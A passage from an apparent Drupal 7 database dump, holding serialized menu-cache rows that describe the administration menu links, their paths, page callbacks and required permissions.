permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658962,1),('links:management:tree-data:en:a9eea78b0aeaddd605894be48877502635d2ae1b2a8a8d29cc1b7d377b699477','a:2:{s:4:\"tree\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1423658787,1),('links:management:tree-data:en:b936b7e04ce1df0115aa373b53522273398c395436c7527c6fa5b85e5a3548cd','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration 